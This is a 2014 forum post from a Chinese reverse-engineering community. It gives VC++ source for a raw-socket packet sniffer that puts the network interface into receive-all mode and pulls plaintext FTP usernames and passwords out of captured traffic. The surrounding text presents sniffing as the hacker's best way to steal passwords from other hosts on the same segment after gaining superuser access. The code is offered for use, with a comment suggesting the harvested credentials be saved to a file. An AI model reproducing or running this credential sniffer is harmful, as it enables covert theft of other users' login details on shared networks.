滴水逆向联盟

标题: VC++监听数据分析出明文账号密码 [打印本页]

---

作者: 大灰狼    时间: 2014-11-7 08:51
标题: VC++监听数据分析出明文账号密码

网络监听是一种监视网络状态、数据流程以及网络上信息传输的管理工具，它可以将网络界面设定成监听模式，并且可以截获网络上所传输的信息。也就是说，当黑客登录网络主机并取得超级用户权限后，若要登录其它主机，使用网络监听便可以有效地截获网络上的数据，这是黑客使用最好的方法。但是网络监听只能应用于连接同一网段的主机，通常被用来获取用户密码等。

请见代码

1. 
   
2. 
   
3. #include <stdio.h>  
   
4. #include <mstcpip.h>  
   
5.   
   
6. #pragma comment(lib, "Advapi32.lib")  
   
7.   
   
8. CInitSock theSock;  
   
9.   
   
10.   
    
11.   
    
12. void GetFtp(char *pData, DWORD dwDestIp)  
    
13. {  
    
14.     char szBuf[256];  
    
15.     static char szUserName[21];  
    
16.     static char szPassword[21];  
    
17.   
    
18.     if(strnicmp(pData, "USER ", 5) == 0)  
    
19.     {  
    
20.         sscanf(pData + 4, "%*[ ]%s", szUserName);     
    
21.     }  
    
22.     else if(strnicmp(pData, "PASS ", 5) == 0)  
    
23.     {  
    
24.         sscanf(pData + 4, "%*[ ]%s", szPassword);  
    
25.   
    
26.         wsprintf(szBuf, " Server Address: %s; User Name: %s; Password: %s; \n\n",   
    
27.                                 ::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword);  
    
28.   
    
29.         printf(szBuf);  // 这里您可以将它保存到文件中  
    
30.     }  
    
31. }  
    
32.   
    
33.   
    
34. void DecodeIPPacket(char *pData)  
    
35. {  
    
36.     IPHeader *pIPHdr = (IPHeader*)pData;  
    
37.   
    
38.   
    
39.     int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeof(ULONG);  
    
40.   
    
41.     switch(pIPHdr->ipProtocol)  
    
42.     {  
    
43.     case IPPROTO_TCP:  
    
44.         {  
    
45.             TCPHeader *pTCPHdr = (TCPHeader *)(pData + nHeaderLen);  
    
46.             switch(::ntohs(pTCPHdr->destinationPort))  
    
47.             {  
    
48.             case 21:    // ftp协议  
    
49.                 {  
    
50.                     GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination);  
    
51.                 }  
    
52.                 break;  
    
53.   
    
54.             case 80:    // http协议...  
    
55.             case 8080:  
    
56.                   
    
57.                 break;  
    
58.             }  
    
59.         }  
    
60.         break;  
    
61.     case IPPROTO_UDP:  
    
62.         break;  
    
63.     case IPPROTO_ICMP:  
    
64.         break;   
    
65.     }  
    
66. }  
    
67.   
    
68.   
    
69. void main()  
    
70. {  
    
71.     // 创建原始套节字  
    
72.     SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);  
    
73.   
    
74.     // 获取本地IP地址  
    
75.     char szHostName[56];  
    
76.     SOCKADDR_IN addr_in;  
    
77.     struct  hostent *pHost;  
    
78.     gethostname(szHostName, 56);  
    
79.     if((pHost = gethostbyname((char*)szHostName)) == NULL)   
    
80.         return ;  
    
81.   
    
82.     // 在调用ioctl之前，套节字必须绑定  
    
83.     addr_in.sin_family  = AF_INET;  
    
84.     addr_in.sin_port    = htons(0);  
    
85.     memcpy(&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length);  
    
86.   
    
87.     printf(" Binding to interface : %s \n", ::inet_ntoa(addr_in.sin_addr));  
    
88.     if(bind(sRaw, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)  
    
89.         return;  
    
90.   
    
91.     // 设置SIO_RCVALL控制代码，以便接收所有的IP包   
    
92.     DWORD dwValue = 1;  
    
93.     if(ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)      
    
94.         return ;  
    
95.       
    
96.     // 开始接收封包  
    
97.     printf(" \n\n begin to monitor ftp password... \n\n");  
    
98.     char buff[1024];  
    
99.     int nRet;  
    
100.     while(TRUE)  
     
101.     {  
     
102.         nRet = recv(sRaw, buff, 1024, 0);  
     
103.         if(nRet > 0)  
     
104.         {  
     
105.             DecodeIPPacket(buff);  
     
106.         }  
     
107.     }  
     
108.     closesocket(sRaw);  
     
109. }  
     

复制代码

---

作者: 大灰狼    时间: 2014-11-7 09:39

---

欢迎光临 滴水逆向联盟 (http://www.dtdebug.com/)

Powered by Discuz! X3.2